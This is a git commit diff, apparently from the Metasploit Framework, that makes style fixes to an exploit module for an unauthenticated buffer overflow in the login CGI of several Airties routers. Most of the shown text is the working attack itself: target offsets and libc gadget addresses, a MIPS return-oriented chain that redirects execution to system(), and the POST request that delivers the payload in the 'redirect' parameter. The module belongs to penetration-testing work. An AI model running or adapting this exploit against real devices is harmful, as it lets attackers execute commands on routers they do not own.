Do minor code cleanup

jvazquez-r7 · jvazquez-r7 · commit 952f391fb4ff · 2015-05-29T10:49:51.000-05:00
diff --git a/modules/exploits/linux/http/airties_login_cgi_bof.rb b/modules/exploits/linux/http/airties_login_cgi_bof.rb
@@ -15,17 +15,17 @@ def initialize(info = {})
     super(update_info(info,
       'Name'           => 'Airties login-cgi Buffer Overflow',
       'Description'    => %q{
-        This module exploits an remote buffer overflow vulnerability on several Airties routers.
-        The vulnerability exists in the handling of HTTP queries to the login cgi with
-        long redirect parameter values. The vulnerability can be exploitable without authentication.
-        This module has been tested successfully on Airties firmware AirTies_Air5650v3TT_FW_1.0.2.0.bin
-        in emulation. Other firmware versions such as the Air6372, Air5760, Air5750, Air5650TT, Air5453,
-        Air5444TT, Air5443, Air5442, Air5343, Air5342, Air5341, Air5021 are also reported as vulnerable.
+        This module exploits a remote buffer overflow vulnerability on several Airties routers.
+        The vulnerability exists in the handling of HTTP queries to the login cgi with long
+        redirect parameters. The vulnerability doesn't require authentication. This module has
+        been tested successfully on the AirTies_Air5650v3TT_FW_1.0.2.0.bin firmware with emulation.
+        Other versions such as the Air6372, Air5760, Air5750, Air5650TT, Air5453, Air5444TT,
+        Air5443, Air5442, Air5343, Air5342, Air5341, Air5021 are also reported as vulnerable.
       },
       'Author'         =>
         [
-          'Batuhan Burakcin <batuhan[at]bmicrosystems.com>',   # discovered the vulnerability
-          'Michael Messner <devnull[at]s3cur1ty.de>', # Metasploit module
+          'Batuhan Burakcin <batuhan[at]bmicrosystems.com>', # discovered the vulnerability
+          'Michael Messner <devnull[at]s3cur1ty.de>' # Metasploit module
         ],
       'License'        => MSF_LICENSE,
       'Platform'       => ['linux'],
@@ -34,31 +34,32 @@ def initialize(info = {})
         [
           ['EDB', '36577'],
           ['URL', 'http://www.bmicrosystems.com/blog/exploiting-the-airties-air-series/'], #advisory
-          ['URL', 'http://www.bmicrosystems.com/exploits/airties5650tt.txt'], #PoC
+          ['URL', 'http://www.bmicrosystems.com/exploits/airties5650tt.txt'] #PoC
         ],
       'Targets'        =>
         [
           [ 'AirTies_Air5650v3TT_FW_1.0.2.0',
             {
               'Offset'         => 359,
               'LibcBase'       => 0x2aad1000,
-              'RestoreReg'     => 0x0003FE20,    # restore s-registers
-              'System'         => 0x0003edff,    # address of system-1
-              'CalcSystem'     => 0x000111EC,    # calculate the correct address of system
-              'CallSystem'     => 0x00041C10,    # call our system
-              'PrepareSystem'  => 0x000215b8,    # prepare $a0 for our system call
+              'RestoreReg'     => 0x0003FE20, # restore s-registers
+              'System'         => 0x0003edff, # address of system-1
+              'CalcSystem'     => 0x000111EC, # calculate the correct address of system
+              'CallSystem'     => 0x00041C10, # call our system
+              'PrepareSystem'  => 0x000215b8  # prepare $a0 for our system call
             }
           ]
         ],
       'DisclosureDate'  => 'Mar 31 2015',
       'DefaultTarget'   => 0))
+
       deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR')
   end
 
   def check
     begin
       res = send_request_cgi({
-        'uri'     => "/cgi-bin/login",
+        'uri'     => '/cgi-bin/login',
         'method'  => 'GET'
       })
 
@@ -103,24 +104,24 @@ def prepare_shellcode(cmd)
                  # 0003FE48                 addiu   $sp, 0x48
 
     shellcode << rand_text_alpha_upper(36)                                 # padding
-    shellcode << [target['LibcBase'] + target['System']].pack("N")         # s0 - system address-1
+    shellcode << [target['LibcBase'] + target['System']].pack('N')         # s0 - system address-1
     shellcode << rand_text_alpha_upper(16)                                 # unused registers $s1 - $s4
-    shellcode << [target['LibcBase'] + target['CallSystem']].pack("N")     # $s5 - call system
+    shellcode << [target['LibcBase'] + target['CallSystem']].pack('N')     # $s5 - call system
 
                  # 00041C10                 move    $t9, $s0
                  # 00041C14                 jalr    $t9
                  # 00041C18                 nop
 
     shellcode << rand_text_alpha_upper(8)                                  # unused registers $s6 - $s7
-    shellcode << [target['LibcBase'] + target['PrepareSystem']].pack("N")  # write sp to $a0 -> parameter for call to system
+    shellcode << [target['LibcBase'] + target['PrepareSystem']].pack('N')  # write sp to $a0 -> parameter for call to system
 
                  # 000215B8                 addiu   $a0, $sp, 0x20
                  # 000215BC                 lw      $ra, 0x1C($sp)
                  # 000215C0                 jr      $ra
                  # 000215C4                 addiu   $sp, 0x20
 
     shellcode << rand_text_alpha_upper(28)                                 # padding
-    shellcode << [target['LibcBase'] + target['CalcSystem']].pack("N")     # add 1 to s0 (calculate system address)
+    shellcode << [target['LibcBase'] + target['CalcSystem']].pack('N')     # add 1 to s0 (calculate system address)
 
                  # 000111EC                 move    $t9, $s5
                  # 000111F0                 jalr    $t9
@@ -134,7 +135,7 @@ def execute_command(cmd, opts)
     begin
       res = send_request_cgi({
         'method' => 'POST',
-        'uri'     => "/cgi-bin/login",
+        'uri'     => '/cgi-bin/login',
         'encode_params' => false,
         'vars_post' => {
           'redirect' => shellcode,
